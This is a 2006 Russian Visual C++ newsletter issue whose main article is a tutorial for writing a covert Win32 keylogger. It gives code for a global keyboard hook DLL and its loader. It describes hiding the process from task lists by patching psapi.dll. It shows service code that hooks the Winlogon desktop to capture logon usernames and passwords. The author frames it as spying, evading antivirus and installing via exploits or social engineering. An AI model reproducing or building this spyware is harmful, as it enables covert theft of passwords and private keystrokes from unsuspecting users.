Отправляет email-рассылки с помощью сервиса Sendsay

Статьи по Visual C++

  Все выпуски  

Реализация keylogging под WIN32


Информационный Канал Subscribe.Ru

Visual C++
Лучшие статьи с сайта www.p-lib.pp.ru
  Главная | Новости | Статьи | Каталог | Софт | Регистрация | Поиск

Приглашаем авторов статей к сотрудничеству с сайтом. Для того чтобы разместить на сайте статью надо заполнить форму или связаться с нами по E-Mail

NEW!  Все желающие могут предложить свои темы для следующих рассылок. Для этого свяжитесь со мной по E-Mail. Каждое предложение будет рассмотрено.

Новые статьи на сайте

1. Работа с клавиатурой
Каждое окно в системе устроено таким образом, что может получать сообщения при нажатии клавиш на клавиатуре. Эти сообщения имеют два типа: виртуальные коды и символьные сообщения.

2. События
Событие является объектом, очень похожим на семафор, но в несколько видоизмененном виде. Рассмотрим функции для работы с событиями.

3. Критические секции
Понятие критической секции позволяет уберечь определенные области программы так, чтобы в этой области программы в данный момент времени исполнялся бы только один поток.

4. Источники данных ODBC
В статье рассмотрены функции по работе с ODBC. В конце приведен небольшой пример.

5. Всплывающие подсказки (ToolTip)
В этой статье будет рассмотрен вопрос создания всплывающих подсказок (ToolTip) средствами MFC, а также рассмотрены некоторые возможности по управлению подсказками.

6. STL: Итераторы
Библиотека STL содержит довольно большое количество средств и возможностей и конечно все я не смогу описать в одной статье. В этой же статье рассказывается об итераторах.

7. STL: Алгоритмы
Алгоритмами в библиотеке STL называют функции-шаблоны. Функции параметризованы по типу итератора. Здесь важно не ошибиться с типом итератора.

8. STL: Адаптеры
Адаптеры изменяют интерфейс существующих компонентов. Есть несколько видов адаптеров.

9. Объекты OLE
OLE это сокращение от Objects Linking and Embedding, т. е. объекты связанные и внедренные. В статье описано использование таких объектов на примере MS Word.

10. Сериализация в MFC
В статье очень подробно рассматривается механизм сериализации, реализованный в MFC. Автор дает полную информацию о работе макросов DECLARE IMPLEMENT_DYNAMIC, DECLARE/IMPLEMENT_SERIAL и DECLARE/IMPLEMENT_DYNCREATE. Также обсуждается поддержка версий схем сериализации.

Свежие компьютерные новости

12.01.2006 Google откроет книжный интернет-магазин
12.01.2006 Opera Software выпускает браузер для бытовой техники
12.01.2006 Windows ХР загрузили на процессоре с частотой 25 МГц и 18 Мб ОЗУ
12.01.2006 Билл Гейтс не считает Google основным конкурентом
12.01.2006 "Битрикс" и NetPromoter проводят семинар
12.01.2006 Крошечный блок питания PicoPSU-120
12.01.2006 Macworld 2006: Microsoft продолжит выпуск Office для Mac OS
12.01.2006 AOL купила компанию видеопоиска Truveo

Реализация keylogging под WIN32

Одним из самых простых методов съёма информации с персонального компьютера является установка на компьютер пользователя программы, производящей учёт нажатий клавиш. Данный метод можно легко осуществить при физическом доступе на интересующий компьютер. Установить кейлоггер можно также и удаленно, используя ошибки в реализациях сервисов объекта, но мы опустим методы установки в данной статье.

Существует большое количество уже готовых программ-кейлоггеров. Однако во-первых большинство из них уже определяются антивирусными программами, во-вторых, зачастую, их функциональность оставляет желать лучшего, либо они работают крайне нестабильно. Одним из видов программ, осуществляющих съём информации, являются KeyLogger-ы (дословно регистратор клавиш). Они регистрируют все нажатые клавиши на клавиатуре, обрабатывают полученную информацию и сохраняют её в файл. Поскольку закрытая информация (пароли, документы, и т.д.) набирается с клавиатуры, KeyLogger является одним из средств её получения.

В операционной системе MSDOS кейлоггер данного вида просто перехватывает прерывание от клавиатуры (int 16h) и нужным образом его обрабатывает. В Win32 все сложнее. Будет уместным описать метод регистрации всех нажатых клавиш с помощью системных ловушек или фильтров (hooks). Этот метод работает как под Win95/98/Millennium так и под WIN NT/2000/XP. В качестве языка программирования для этой задачи стоит выбрать C/C++, а средой разработки MS Visual C++. Ассемблер для этих целей подходит лучше, но писать на Ассемблере в Win32 слишком утомительно и долго.

В Win32 API присутствует функция SetWindowsHookEx. Она позволяет определить некоторую (собственную) функцию которая будет срабатывать каждый раз при наступлении некоторого события (получение программой сообщения, нажатия клавиши на клавиатуре, создания окна и т.д.). Полное описание данной функции можно прочитать в MSDN (Microsoft Developer Network Library).

Первый параметр данной функции указывает событие, на которое мы ставим ловушку. В нашем случае - клавиатура - WH_KEYBOARD.

На втором месте в обработчике вызова мы должны указать адрес функции, которая будет вызываться каждый раз при наступлении данного события. Вид этой функции (для обработки нажатий клавиш) следующий:

LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam);

где:
code - способ обработки клавиши приложением.
wParam - содержит виртуальный код нажатой клавиши.
lParam - представляет собой 4-x байтовую структуру данных, где в качестве полей выступают её биты. Биты 0-15 определяют сколько раз произошло событие (значение отлично от 1 в случае, если клавиша удерживается некоторое время), биты 16-23 определяют scan-код нажатой (отпущенной) клавиши, а 31-ый бит определяет, была ли клавиша нажата или отпущена.

Параметр code применяется для отсеивания лишних событий. Например, при наборе в MS Word текста "123" наш обработчик получит по паре событий на каждое нажатие клавиши ("112233") При поступлении интересующего нас сообщения сообщения данный параметр равен HC_ACTION.

Поскольку KeyboardProc используется системой, мы должны при описании указать CALLBACK.

Итак, для обработки нажатых клавиш мы должны написать свою процедуру KeyboardProc примерно следующим образом:

LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)
{
  DWORD IsDown, ScanCode;

  IsDown = !(lParam >> 31);
  ScanCode = lParam << 8;
  ScanCode >>= 24;

  if (IsDown && code == HC_ACTION)
    ProccessDownKey(wParam, (unsigned char)ScanCode);//Обрабатываем

  return 0;
}

В MSDN сказано, что если параметр code < 0, то нужно предать управление следующей ловушке вызовом CallNextHookEx, но на практике можно этого не делать, а просто возвратить из KeyboardProc 0 и все будет работать.

Третий параметр SetWindowsHookEx - дескриптор модуля в котором находится KeyboardProc, а четвертый - идентификатор потока, для которого устанавливается ловушка (0 - для всех потоков в системе). Фильтр может устанавливаться как на один поток одного приложения, так и на все потоки всех приложений. В последнем (наиболее интересном) случае KeyboardProc должна находиться в DLL (Dynamic Link Library). Так сделано из-за особенностей архитектуры Windows, в которой каждый процесс имеет свое адресное пространство. С помощью Visual C++ реализация собственной dll-библиотеки является несложной.

Важным моментом является то, что при запуске каждой новой программы при активном фильтре, Windows создает новую копию всех данных DLL, содержащей KeyboardProc, и динамическая библиотека внедряется в адресное пространство запускаемого процесса. Поэтому все глобальные данные следует хранить следующим образом:

1. В исходном коде DLL написать следующее:

#pragma data_seg(".SHAREDDATA")
/*
 ...
 ...
Глобальные данные
 ....
Например:*/

static char logFileName[128] = {0}; //Имя файла отчета
static int dllsCount; //Число внедренных DLL

// и т.д.
#pragma data_seg()

2. В .def - файле библиотеки написать: 

SECTIONS
 .SHAREDDATA Read Write Shared

При обработки события от клавиатуры возникает проблема: Как получить символ (например 'A' или 'a', 's' или 'ы'), который действительно вводил пользователь. Для этого можно воспользоваться функциями ToAscii и ToUnicode, которые позволяют по scan-коду и виртуальному коду, а также состоянию клавиатуры определить конкретный символ.

Мы опустим подробное описание механизма загрузки DLL, и получения адреса функции, а приведём пример непосредственного использования нашей библиотеки.

Пусть библиотека, содержащая необходимую нам функцию KeyboardProc, называется hooklib.dll.

#include  <windows.h>

int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
{
  HHOOK hHook;
  HINSTANCE hLib;
  HOOKPROC pKeybrdProc;

  hLib = LoadLibrary("hooklib.dll");

  if (hLib == NULL)
    return 0; //Ошибка

  pKeybrdProc = reinterpret_cast<HOOKPROC>(GetProcAddress(hLib, "KeyboardProc"));

  if (pKeybrdProc == NULL) {
    FreeLibrary(hLib); //Ошибка
    return 0;
  }

  hHook = SetWindowsHookEx(WH_KEYBOARD, pKeybrdProc, hLib, 0);

  if (hHook == NULL) {
    FreeLibrary(hLib); //Ошибка
    return 0;
  }

  //....
  //GetMessage и т. д. пока не поступит WM_QUERYENDSESSION
  //....

  UnhookWindowsHookEx(hHook);
  FreeLibrary(hLib);

  return 0;
}

Примечательно, что данный метод работает и в Windows NT/2000/XP, поскольку функция SetWindowsHookEx не требует никаких привилегий (например SeDebugPrivilege) и будет работать даже под обычным пользователем. Это можно воспринимать как слабину в системе безопасности NT/2000/XP, поскольку всё же происходит внедрение в адресное пространство процесса. (Вспомним атаку GetAdmin, где с помощью внедрения в процесс, в NT без SP3 можно было получить права администратора под пользователем guest!!!).

Более подробную информацию по фильтрам вы можете найти в MSDN, в статье "Win32 Hooks".

Важным моментом любой программы такого рода является маскировка.

В Win95/98/Millennium программу можно скрыть из списка задач функцией RegisterServiceProcess, после этого она не будет видна в списке задач taskman'a, показываемом по нажатии "Ctrl + Alt + Del". Однако любой менеджер процессов (к примеру, SysInfo) всё равно покажет нашу программу, поэтому при написании нужно создавать и информацию о версии. Так будет менее заметней. SysInfo также определяет все установленные в системе ловушки. Функцию RegisterServiceProcess просто так вызвать не удастся, поскольку она не объявленна в windows.h (winuser.h и т.д.). Её нужно вызывать напрямую из KERNEL32.DLL. Она имеет следующий прототип:

DWORD RegisterServiceProcess(DWORD dwProcessId, DWORD dwType);

где dwProcessId - Id процесса(0 - вызывающий), а dwType = 1, если делаем процесс сервисом, и 0, если убираем сервисные свойства.

Решить задачу маскировки в системах NT/2000/XP куда сложней. Одним из способов можно считать подмену psapi.dll из WINNT\system32 таким образом, чтобы в записи для функции EnumProcesses в таблице экспорта этой dll, точка входа (entry point) указывала не на настоящую реализацию этой функции, на некоторую собственную, с последующим вызовом оригинала. Однако этот механизм не будет работать для тех приложений, которые 'жестко' связаны с psapi.dll с помощью утилиты bind.exe.

Точки входа для каждой экспортируемой функции из любой dll можно посмотреть с помощью утилиты depends входящий в поставку Platform SDK.

Также считаю уместным рассказать в данной статье, как сделать кейлоггер для NT/2000/XP так, чтобы он мог получать информацию (имя пользователя и пароль), которая набирается с клавиатуры при входе пользователя в систему. Данная задача осложняется двумя факторами:

  1. Система отображает приглашение на вход (нажмите Ctrl+Alt+Del и т.д.) до запуска любого пользовательского процесса. То есть, если ваша программа-шпион запускается автоматически или из системной папки Startup или из раздела реестра Run или из некоторых системных ini-файлов, то она не сможет получить информацию, о которой идет речь, просто потому, что ее запуск произойдет уже после того, как пользователь вошел в систему. При попытке завершить сеанс работы и войти под другим пользователем, ваша программа так же будет завершена и запушена после регистрации пользователя в системе.
  2. Окно ввода пароля и входного имени (также как и окно приглашения) защищено отдельным механизмом windows, называемым 'рабочий стол' (Desktop - опять же, смотрите MSDN) и процессы, запушенные из-под других рабочих столов, физически не имеют доступа к этим окнам. (даже функция FindWindow их не найдет). Таким образом, и фильтр, установленный функцией SetWindowsHookEx, не будет срабатывать на действия в интересующих нас окнах.

Для решения этих проблем предлагаю следующий механизм:

Во-первых, приложение, устанавливающее фильтр клавиш, должно быть оформлено в виде сервиса Win32. (Как сделать сервис можно прочитать в MSDN - глава "Services" раздела "Platform SDK: DLLs, Processes and Threads".)

Во-вторых, сервис должен быть зарегистрирован как запускаемый автоматически (SERVICE_AUTO_START - смотрите описание функции CreateService); ну и много же прав вам понадобиться, что бы зарегистрировать сервис ;-). Ну ничего, всегда найдутся ошибки переполнения буфера и т.д. В конце - концов, можно попытать счастье в социальной инженерии.

И наконец, самое главное: Имя рабочего стола c окном ввода пароля - "Winlogon" и он находится в интерактивной 'оконной станции' (window station) c именем "Winsta0". Таким образом, чтобы процесс (точнее его поток) мог попасть в данный рабочий стол и установить там ловушку нужно воспользоваться функциями Win32 API OpenWindowStation, SetProcessWindowStation, OpenDesktop и SetThreadDesktop. (cм. Главу "Interactive Services" из MSDN). Если эти функции вызывать из-под сервиса, запускаемого под System - стандартное поведение после регистрации с помощью CreateService с предпоследним параметром равным NULL, то прав хватит сполна и для вызова этих функций и для установки ловушки так, чтобы она обрабатывала интересующие нас окна процесса Winlogon.exe. В качестве параметров, которые обозначают имена этих объектов (рабочий стол, оконная станция), нужно задать приведенные выше значения. Механизм подключения к рабочему столу должен предшествовать вызову функции SetWindowsHookEx. Примечание: не забудьте добавить отдельный поток на пользовательский рабочий стол - "default" из "Winsta0", иначе ловушка не сможет регистрировать действия пользователя после входа в систему. Также хочу отметить, что для не интерактивных сервисов системой создается отдельная оконная станция и рабочий стол, в котором они и запускаются. То есть, без подключения к некоторому реальному рабочему столу, вызывать функцию SetWindowsHookEx из сервиса не имеет смысла.

Приведу небольшой пример реализации сервиса и подключения к рабочему столу. В данном примере я опустил всю обработку ошибок.

#include <windows.h>

void WINAPI MyServiceStart(DWORD, LPTSTR *);
void WINAPI MyServiceCtrlHandler(DWORD);
void ServiceWorkFunction();

SERVICE_STATUS_HANDLE MyServiceStatusHandle; 

int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
{
  SERVICE_TABLE_ENTRY DispatchTable[] = {{"MyService", MyServiceStart}, 
                                         {NULL, NULL}}; 

  //Вызываем точку входа сервиса
  StartServiceCtrlDispatcher(DispatchTable);
}

void WINAPI MyServiceStart(DWORD, LPTSTR *)
{
  SERVICE_STATUS MyServiceStatus = {0}; 

  MyServiceStatus.dwServiceType = SERVICE_WIN32; 
  MyServiceStatus.dwCurrentState = SERVICE_RUNNING; 

  //Регистрируем обработчик событий сервиса
  MyServiceStatusHandle = RegisterServiceCtrlHandler("MyService", 
                                                      MyServiceCtrlHandler);
  SetServiceStatus(MyServiceStatusHandle,  &MyServiceStatus);

  ServiceWorkFunction();
}

void WINAPI MyServiceCtrlHandler(DWORD)
{
  SERVICE_STATUS MyServiceStatus = {0}; 

  MyServiceStatus.dwServiceType = SERVICE_WIN32; 
  MyServiceStatus.dwCurrentState = SERVICE_RUNNING;

  SetServiceStatus(MyServiceStatusHandle,  &MyServiceStatus);
}

void ServiceWorkFunction()
{
  HWINSTA hWS;
  HDESK hDT;

  //Подключаемся к оконной станции
  hWS = OpenWindowStation("Winsta0", FALSE, GENERIC_ALL);
  SetProcessWindowStation(hWS);

  //Подключаемся к рабочему столу
  hDT = OpenDesktop("Winlogon", 0, FALSE, GENERIC_ALL);
  SetThreadDesktop(hDT);

  //SetWindowsHookEx и т.д.
}

Вот и всё.

Книги с озона

Visual C++.NET. Библия пользователя Visual C++.NET. Библия пользователя

Эта книга посвящена библиотеке MFC, a не только платформе .NET. Весь материал разбит на разделы, освещающие отдельные направления разработки, объединенные в логически упорядоченные категории, что позволит новичкам получить систематизированные знания, читая книгу шаг за шагом, а квалифицированный программист легко найдет интересующие разделы. Каждая глава начинается вводным разделом, содержащим краткую информацию по обсуждаемой теме, а затем следует пример довольно простого демонстрационного приложения. Книга предназначена для программистов средней и высокой квалификации.

Заказать на Озоне

Visual C++.NET. Класссика програмирования (+ CD-ROM) Visual C++.NET. Класссика програмирования (+ CD-ROM)

"Visual C++.Net. Классика программирования" - книга, необходимая как начинающему программисту, так и профессионалу, желающему познакомиться с новыми возможностями последней версии наиболее популярной системы программирования. Изучение этой книги не требует глубоких знаний языка C++, однако предполагается знание основ языка С. Поэтапное изучение предмета позволит человеку с любым уровнем начальных знаний о языке программирования C++ легко изучить самую современную его версию. Данная книга - не просто учебник по языку программирования, это первый шаг в создании удобных, профессиональных приложений, ориентированных на Internet.

Заказать на Озоне

Использование Microsoft Visual C++ .NET. Специальное издание Использование Microsoft Visual C++ .NET. Специальное издание

Эта книга фокусирует внимание читателя на использовании языка программирования Visual C++ при создании 32-разрядных Windows-приложений, включая приложения баз данных, Internet-приложения и СОМ-приложения. Помимо этого, здесь содержится описание технологии .NЕТ и способа применения языка Visual C++ при создании .NЕТ-приложений, использующих базы данных, взаимодействующих с Internet и т.д. Особое внимание автор книги уделяет совместному использованию технологий .NЕТ и СОМ. Эта книга будет полезна как начинающим, так и опытным программистам.

Заказать на Озоне

Последнии статьи по Delphi

   -  Оператор перехода (GoTo)
   -  Бегущая строка (Метод III)
   -  Методика модификации программ для скрытия их от антивирусов
   -  Нестандартные заголовки
   -  Создание бегущей строки в Delphi
   -  Введение в реккурсию
   -  Перевод в Delphi-приложениях
   -  Сравнительный анализ технологий CORBA и COM - Часть 3
   -  Сравнительный анализ технологий CORBA и COM - Часть 2
   -  Сравнительный анализ технологий CORBA и COM - Часть 1

Советую посетить

Портал для Delphi программиста - Быстро развивающийся портал о программирование на языке Pascal/Delphi. Статьи, исходники, компоненты, справочники, мануалы, FaQ, программы.

Дружественные рассылки

Статьи по Visual Basic.NET
Статьи по ASP.NET
Delphi Coding
Интернет и Delphi

Замечания и предложения отправляйте на E-Mail указанный ниже. С уважением Ковязин Дмитрий (admin@p-lib.pp.ru).



Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора
Подписан адрес:
Код этой рассылки: comp.soft.prog.visualc
Архив рассылки
Отписаться Вебом Почтой
Вспомнить пароль

В избранное